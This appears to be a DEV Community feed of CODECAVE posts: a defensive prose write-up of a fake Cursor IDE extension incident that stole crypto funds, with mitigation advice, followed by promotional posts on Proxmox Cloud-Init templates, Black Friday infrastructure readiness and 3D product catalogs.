DEV Community: CODECAVE

$500K was stolen through a fake IDE extension

CODECAVE — Thu, 02 Oct 2025 11:00:40 +0000

In July, $500K was stolen through a fake IDE extension. No 0days — just blind trust in a marketplace. Here’s why every fintech should care and what you can fix in 48 hours

In July 2025, a fake “Solidity Language” plugin appeared on the Open VSX marketplace for the Cursor IDE. The extension executed malicious code, downloaded a backdoor, and enabled attackers to steal crypto assets. The attackers used search manipulation and boosted download counts to make the fake plugin look trustworthy.

What exactly happened

A blockchain developer installed the fake “Solidity Language” plugin from Open VSX into Cursor IDE. The name fully matched the legitimate one.
Inside the plugin, an extension.js file launched a PowerShell script that downloaded additional components: a RAT (Quasar) and a targeted stealer designed to locate and exfiltrate private keys and other secrets.
Result: attackers gained access to crypto assets, and about $500K was drained from the wallet.

Attack chain: how it worked

Search spoofing & social engineering
The attackers uploaded a plugin with the same name and nearly identical metadata. They spoofed the author name (juanbIanco vs juanblanco — uppercase “I” vs lowercase “l”), and in Cursor’s font those characters were visually indistinguishable. Users had no easy way to tell the fake apart. (securelist.com)

Ranking manipulation
Fake download activity boosted the malicious extension above the real one in search results.

Malicious execution
Once installed, the plugin executed extension.js, launched a PowerShell script, downloaded Quasar RAT and a stealer, and deployed additional modules.

Environment exploitation
Because the developer stored private wallets and project secrets locally, the attackers extracted keys and moved funds.

Why this matters to CTOs, CEOs and dev teams in fintech/crypto

Open VSX does not enforce thorough security checks before publishing extensions — this is why such incidents slip through.

What to do:

1.Don't rely on names or download counts
Attackers mimic legitimacy with metadata and ranking manipulation.

2.Restrict extension privileges
Block or sandbox extensions that can run arbitrary code/scripts without explicit approval.

3.Never store keys/seeds in IDE environments
Use hardware wallets, secure VMs or enclaves. Keep production secrets off dev machines.

4.Create a company-wide extension policy
Centralized whitelists/blacklists. Only allow installs from an internal catalog.

5.Enable monitoring and EDR
Track PowerShell execution, unusual network behavior and extension scripts.

6.Secure CI/CD and dependencies
Use SCA scanners, version pinning, checksum validation and supply chain controls.

## And there’s another trend making this worse: AI-driven development
Apiiro analyzed tens of thousands of repos written by developers from Fortune 50-related companies. Key findings:

AI assistants reduce syntax errors by 76% and logic mistakes by 60%.
But AI-generated code contains: 322% more vulnerabilities that enable privilege escalation; 153% more architectural security flaws.

AI fixes typos — but also unknowingly inserts ticking time bombs. With faster code output and wider use of helper tools like Cursor, the number of hidden vulnerabilities and risky extensions will only grow.
This incident is a clear example of how supply chain trust and developer tooling choices translate directly into financial losses and reputation damage. For crypto, fintech and SaaS companies, this is a signal to act systemically: DevSecOps + supply-chain control + extension/security governance.

We provide services around Azure, Proxmox, secure VM templates and CI/CD hardening. Check the DevOps section on our website if you'd like help implementing safeguards.

Can your developers install plugins and extensions without any approval — or have you already locked this down?

Proxmox VM Templates and Cloud-Init

CODECAVE — Tue, 23 Sep 2025 07:59:52 +0000

Proxmox and Cloud-Init virtual machine templates
In the world of virtualization, efficiency and automation are key. This is where Proxmox Virtual Environment (VE) comes into play, offering a robust solution for easily managing virtual machines (VMs). One of the most interesting features of Proxmox is the ability to use virtual machine templates in combination with Cloud-Init, which simplifies the deployment process and makes it as smooth as in the cloud. Let's figure it out.
What is Proxmox?
Proxmox is a free and open source virtualization platform, which means anyone can use or modify it at no cost. It's like a set of tools that allows you to create multiple isolated computers (virtual machines) on a single physical machine. These virtual machines can simultaneously run multiple operating systems such as Windows or Linux, making them versatile for testing, development, or even production environments.

Proxmox is the manager of these virtual environments. It uses a technology called KVM (kernel-based virtual machine), which ensures that each virtual machine runs smoothly without interfering with others. In addition, Proxmox can handle so-called containers via LXC (Linux Containers), which are even lighter than VMs and great for running individual applications with minimal overhead.

You also can manage your VMs and containers from a browser. Web-based interface designed to be user-friendly, so even those new to virtualization can get started without too much trouble.

What are Proxmox VM Templates?
Proxmox VM templates are essentially pre-configured VMs that serve as blueprints for creating new instances. They include the operating system, installed software, and system configurations. The beauty of templates is that they save time and ensure consistency across deployments. You can quickly spin up new VMs without going through the entire installation and configuration process each time.

The Role of Cloud-Init
Cloud-Init is a versatile package that supports various distributions and handles the initial setup of a VM instance, such as network configuration and SSH key distribution. When a VM boots for the first time, Cloud-Init applies the predefined settings, allowing for a hands-off approach to VM provisioning https://pve.proxmox.com/wiki/Cloud-Init_Support.

Combining Proxmox Templates with Cloud-Init
Integrating Cloud-Init with Proxmox VM templates brings the best of both worlds. Here's how you can leverage this combination to your advantage:

Step 1: Preparing Your Template
Start by preparing your VM with the desired configuration. Install the operating system and all necessary packages, including Cloud-Init. Once your VM is ready, convert it into a template to serve as the foundation for future VMs.

Read the full article: https://bit.ly/47WX1Ce

Black Friday will test your infrastructure. Will it pass?

CODECAVE — Fri, 19 Sep 2025 09:45:54 +0000

We've compiled a BINGO of the most common infrastructure challenges based on real conversations with our clients.
No scaling → downtime risks
No stress tests → surprises on peak days
No dashboards → zero visibility into system health
Weak security → potential breaches

How many boxes would your company tick?

📌 Not sure if your infrastructure can handle the next traffic spike?
Let’s jump on a free call — we’ll help you spot weak points before your customers do.

original source: https://lnkd.in/p/drXGKZHX

Are you a CTO, CEO, or eCommerce manager drowning in 100+ SKUs and endless product configurations?

CODECAVE — Tue, 16 Sep 2025 06:18:41 +0000

3D catalogs and AR product previews are becoming a real tool to speed up configuration and improve buyer confidence.
We broke it all down in the article — with real examples from Nike, IKEA, and L’Occitane.

Learn what a 3D product catalog is, why it matters in modern e-commerce, and how companies are using it to improve engagement and conversions – especially when traditional catalogs fall short.

Read the article: https://lnkd.in/e5krN9zd